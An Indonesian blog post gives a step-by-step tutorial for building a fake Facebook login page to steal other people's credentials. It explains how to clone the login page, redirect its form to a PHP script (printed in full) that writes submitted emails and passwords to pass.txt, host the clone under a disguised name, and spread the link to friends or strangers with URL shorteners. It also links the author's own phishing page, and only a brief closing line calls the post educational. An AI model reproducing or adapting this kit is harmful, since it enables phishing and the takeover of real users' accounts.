10 Langkah Hacking Facebook Dengan Teknik Fake Login

facebook login
Oke, sudah lama saya tidak menulis di internet. Kali ini saya mau bagi-bagi ilmu gimana caranya bikin fake login Facebook.
Apa itu fake login? Fake login adalah sebuah interface buatan yang menyerupai suatu website dengan tujuan untuk mengelabuhi target agar email dan sandi yang sifatnya rahasia dapat diketahui. Bagaimana caranya?Ikuti baik-baik tahap yang akan saya berikan.

  1. Koneksi Internet
  2. Masuk ke http://www.facebook.com/login.php/
  3. Klik kanan, pilih save as atau save page as
  4. Lalu anda akan memiliki file yang bernama “Log in Facebook.htm” dan folder berupa kumpulan file yang bernama “Log in   Facebook_Files”
  5. Pada file ”Log in Facebook.htm” klik kanan, open in notepad lalu ganti kode <div><form id=”login_form” action=”https://www.facebook.com/login.php?login_attempt=1″method=”post” menjadi <div><form id=”login_form” action=””next.php method=”post” untuk menemukannya, cukup dengan “ctrl+f”  (find) dan jangan lupa di save
  6. Anda harus memiliki hosting dan domain terlebih dahulu. Jika saya menggunakan 000webhost.com dengan url yang telah diberikan dari 000webhost (lebih detil cari cara bagaimana membuat sebuah web)
  7. Upload file ”Log in Facebook.htm” lalu ganti nama dengan nama apa saja yang anda inginkan namun jangan tertera kata “facebook”
  8. Upload file yang ada di “Log in   Facebook_Files” ke hosting yang sudah kamu buat
  9. Buat php script dengan nama “next.php” dengan notepad, kemudian ganti extention dari .txt menjadi .php (yang harus anda isi akan saya berikan di bawah) kemudian upload ke hosting tempat dimana anda menaruh file dengan extention .htm tadi.
  10. Good Job! sekarang tinggal berikan URL fake login tersebut ke teman anda atau sebarkan secara random dengan embel-embel aplikasi baru atau cara baru login di facebook. Atau jika mau lebih menipu, gunakan URL shortner seperti bit.ly atau tinyurl.
Jika berhasil, maka di tempat dimana anda mengupload file tadi akan tebuat file baru bernama pass.txt yang berisikan email dan password si target. Ini dia fake user interface yang telah saya buat http://facesbook.site11.com/New%20Log%20In.htm
script next.php
<?php
header(“Location: 
http://www.Facebook.com/login.php “);
$handle = fopen(“pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
ATTETION: Artikel ini hanya bersifat edukasi, nilai yang didapat adalah jangan sekali-kali login dari url selain facebook.com. Sorry for no picture buat tutorialnya. Salam.

Komentar

Posting Komentar

Berkomentarlah dengan baik di blog ini ;
1. Dilarang SPAM
2. Berkomentarlah sesuai judul postingan, no OOT (Out of topic)
3. Berkomentarlah dengan kata kata yang sopan

Postingan populer dari blog ini

Ide Cerdas Membuat Artikel Original

Mengoptimasi Blog Dengan Webmaster Tools